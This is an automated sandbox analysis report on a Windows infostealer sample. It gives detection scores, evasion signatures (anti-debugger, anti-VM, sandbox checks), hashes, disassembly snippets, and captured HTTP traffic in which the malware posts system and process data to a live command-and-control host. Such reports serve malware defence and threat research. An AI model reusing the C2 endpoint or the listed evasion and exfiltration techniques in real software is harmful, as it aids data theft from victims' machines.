Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xXe4fTmV2h.exe

Overview

General Information

Sample name:xXe4fTmV2h.exe
renamed because original name is a hash value
Original sample name:764767d6adf6fa8a9c0b437d79a7a973.exe
Analysis ID:1581223
MD5:764767d6adf6fa8a9c0b437d79a7a973
SHA1:f06803c1321e1b613f494e337a3e7b6c11f2e880
SHA256:f938e11a28c63ca465cec4151a02add7ff1f534d31eb8ad1e4e765620da43762
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • xXe4fTmV2h.exe (PID: 2028 cmdline: "C:\Users\user\Desktop\xXe4fTmV2h.exe" MD5: 764767D6ADF6FA8A9C0B437D79A7A973)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: xXe4fTmV2h.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: xXe4fTmV2h.exeVirustotal: Detection: 40%Perma Link
Source: xXe4fTmV2h.exeReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: xXe4fTmV2h.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: -----BEGIN PUBLIC KEY-----5_2_00C2DCF0
Source: xXe4fTmV2h.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [ebp+04h], 424D53FFh5_2_00C6A5B0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [ebx+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [edi+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [esi+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [edi+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [esi+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [ebx+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [ebx+04h], 424D53FFh5_2_00C6B560
Source: xXe4fTmV2h.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_00C0255D
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,5_2_00C029FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500771Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 37 33 33 31 37 38 38 37 34 33 35 33 31 34 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCA8C0 recvfrom,5_2_00CCA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500771Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 37 33 33 31 37 38 38 37 34 33 35 33 31 34 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:47:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:47:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.css
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.jpg
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: xXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: xXe4fTmV2h.exe, 00000005.00000003.1421794650.0000000001A54000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1427254897.0000000001A1E000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1427384359.0000000001A54000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1421486378.0000000001A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: xXe4fTmV2h.exe, 00000005.00000002.1427254897.0000000001A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0p
Source: xXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: xXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lsef
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://html4/loose.dtd
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: xXe4fTmV2h.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: xXe4fTmV2h.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: xXe4fTmV2h.exe, xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ip
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708

System Summary

barindex
PE file contains section with special chars
Source: xXe4fTmV2h.exeStatic PE information: section name:
Source: xXe4fTmV2h.exeStatic PE information: section name: .idata
Source: xXe4fTmV2h.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01AB6F515_3_01AB6F51
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C105B05_2_00C105B0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C16FA05_2_00C16FA0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCB1805_2_00CCB180
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C3F1005_2_00C3F100
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CD00E05_2_00CD00E0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F8E0505_2_00F8E050
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F8A0005_2_00F8A000
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C662105_2_00C66210
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCC3205_2_00CCC320
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F544105_2_00F54410
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CD04205_2_00CD0420
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0E6205_2_00C0E620
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C6A7F05_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F847805_2_00F84780
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCC7705_2_00CCC770
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F667305_2_00F66730
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C149405_2_00C14940
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0A9605_2_00C0A960
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CBC9005_2_00CBC900
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00DD6AC05_2_00DD6AC0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00EBAAC05_2_00EBAAC0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F78BF05_2_00F78BF0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0CBB05_2_00C0CBB0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00D94B605_2_00D94B60
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00EBAB2C5_2_00EBAB2C
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F8CC905_2_00F8CC90
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F7CD805_2_00F7CD80
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F84D405_2_00F84D40
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F1AE305_2_00F1AE30
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCEF905_2_00CCEF90
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CC8F905_2_00CC8F90
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F52F905_2_00F52F90
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C24F705_2_00C24F70
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C110E65_2_00C110E6
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F6D4305_2_00F6D430
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F735B05_2_00F735B0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F556D05_2_00F556D0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F917A05_2_00F917A0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CB98805_2_00CB9880
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F599205_2_00F59920
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F83A705_2_00F83A70
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C41BE05_2_00C41BE0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F71BD05_2_00F71BD0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F67CC05_2_00F67CC0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00EB9C805_2_00EB9C80
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C15DB05_2_00C15DB0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C13ED05_2_00C13ED0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C25EB05_2_00C25EB0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C450A0 appears 92 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C073F0 appears 114 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00DDCBC0 appears 103 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C0C960 appears 37 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C075A0 appears 674 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C1CD40 appears 78 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00CE44A0 appears 75 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C1CCD0 appears 55 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C071E0 appears 47 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C0CAA0 appears 63 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C45340 appears 50 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C44FD0 appears 274 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C44F40 appears 337 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00DB7220 appears 95 times
Source: xXe4fTmV2h.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: xXe4fTmV2h.exeStatic PE information: Section: mizvqalk ZLIB complexity 0.9943081642199194
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
